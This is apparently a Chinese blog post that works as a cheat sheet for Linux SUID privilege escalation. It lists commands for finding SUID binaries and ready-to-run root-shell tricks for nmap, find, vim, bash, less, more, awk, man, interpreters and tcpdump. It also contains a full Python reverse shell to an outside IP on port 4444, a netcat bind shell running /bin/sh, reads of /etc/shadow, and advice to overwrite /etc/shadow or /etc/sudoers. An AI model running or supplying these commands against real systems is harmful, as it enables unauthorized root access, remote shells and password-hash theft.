Linux提权之Suid提权 小部分归纳

Linux提权之Suid提权
SUID是linux的一种权限机制
具有这种权限的文件会在其执行的时候,使调用者暂时获得该文件拥有者的权限。如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具进行root提权
已知的可用于提权的linux可行性文件列表如下:
Nmap
Vim
find
Bash
More
Less
Nano
cp
使用如下命令可以发现系统上运行的所有SUID可执行的文件  命令将查找具有root权限的SUID的文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
1.Nmap
较旧版本的Nmap(2.02-5.21)具有交互模式 允许用户执行shell命令
由于Nmap在使用root权限执行的二进制文件列表中,因此可以使用交互式控制台来运行具有相同权限的shell
nmap -v   #查看nmap的版本
nmap --interactive   #nmap的交互模式
如下命令可以提供一个提升的shell
nmap> !sh
sh-3.2# whoami
root
也可以通过Metasploit模块对Nmap的二进制文件进行权限提升
use exploit/unix/local/setuid_nmap
2.Find
如果find命令也是以suid权限运行的话 那么通过find执行的 所有命令都会以root权限执行
touch pentestlab
find pentestlab -exec whoami \;
以上也可以使用
/usr/bin/find xbw -exec whoami \;   #xbw可以是任意的文件 这并不重要
进阶1:甚至可以用root权限身份借助python反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.25",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'  #反弹一个sh类型的shell
即:
/usr/bin/find xbw -exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.25",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' \;
黑客kali端
nc -lvp 4444   #监听相应端口的信息
进阶2:大部分Linux操作系统都安装了netcat 也可以被利用来提升权限到root  
通过nc把root权限反弹到其他用户上去执行root命令
touch pentestlab
#find pentestlab -exec whoami \;
find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;
netcat 192.168.1.189 5555
cat /etc/shadow
3.VIM
vim是linux下的文本编辑器。如果以suid运行,则会继承root用户的权限,可以读取系统上的所有文件
vim.tiny /etc/shadow
vim.tiny /etc/passwd
vim.tiny
# Press ESC key
:set shell=/bin/sh
:shell
4.Bash
以下命令将以root权限打开一个bash shell
bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
5.Less
6.More
Less和More都可以执行用来提权  本质和vim一样 都是查看文件内容的
less /etc/passwd
!/bin/sh
more /home/pelle/myfile
!/bin/bash
7.cp
使用cp覆盖 /etc/shadow
8.mv
使用mv覆盖 /etc/shadow  或者 /etc/sudoers
9.awk
awk 'BEGIN {system("/bin/bash")}'
10.man
man passwd
!/bin/bash
11.python/perl/ruby/lua/etc
perl
exec "/bin/bash";
python
import os
os.system("/bin/bash")
12.tcpdump
echo $'id\ncat /etc/shadow' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Simon_Smith

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值